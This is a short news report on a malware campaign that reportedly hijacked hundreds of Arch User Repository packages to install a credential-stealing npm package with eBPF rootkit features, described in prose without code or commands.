Security researchers have discovered a large-scale malware campaign targeting Arch Linux users through the Arch User Repository (AUR). More than 400 packages were reportedly modified to distribute a credential-stealing malware and Linux rootkit.
According to researchers from the Independent Federated Intelligence Network (IFIN), a threat actor impersonated a trusted AUR maintainer and gained control of numerous packages. The attacker added malicious installation scripts that downloaded and executed a rogue npm package called ‘atomic-lockfile’ during software installation.
Analysis of the npm package revealed a Linux ELF binary named ‘deps.’ Researchers identified the malware as an infostealer designed to collect sensitive data from developer systems, including GitHub credentials, SSH keys, HashiCorp Vault tokens, browser cookies, shell histories, and data from applications such as Slack, Discord, Microsoft Teams, and Telegram.
The malware also contains optional eBPF (extended Berkeley Packet Filter) rootkit functionality. eBPF allows code to run inside the Linux kernel with elevated privileges, enabling the malware to potentially hide processes, files, and network activity from security tools.
A separate investigation conducted by supply-chain security firm Sonatype found a related attack involving at least 20 orphaned AUR packages. In those cases, attackers modified package PKGBUILD files to run post-install scripts that automatically installed the malicious npm package.
Researchers noted that the malware includes capabilities for archiving stolen data, splitting files into multiple parts, and uploading information to remote servers.
Arch Linux maintainers are currently working to remove malicious package changes and ban the accounts responsible. Users are advised to review AUR packages carefully before installation and favor actively maintained projects with established communities.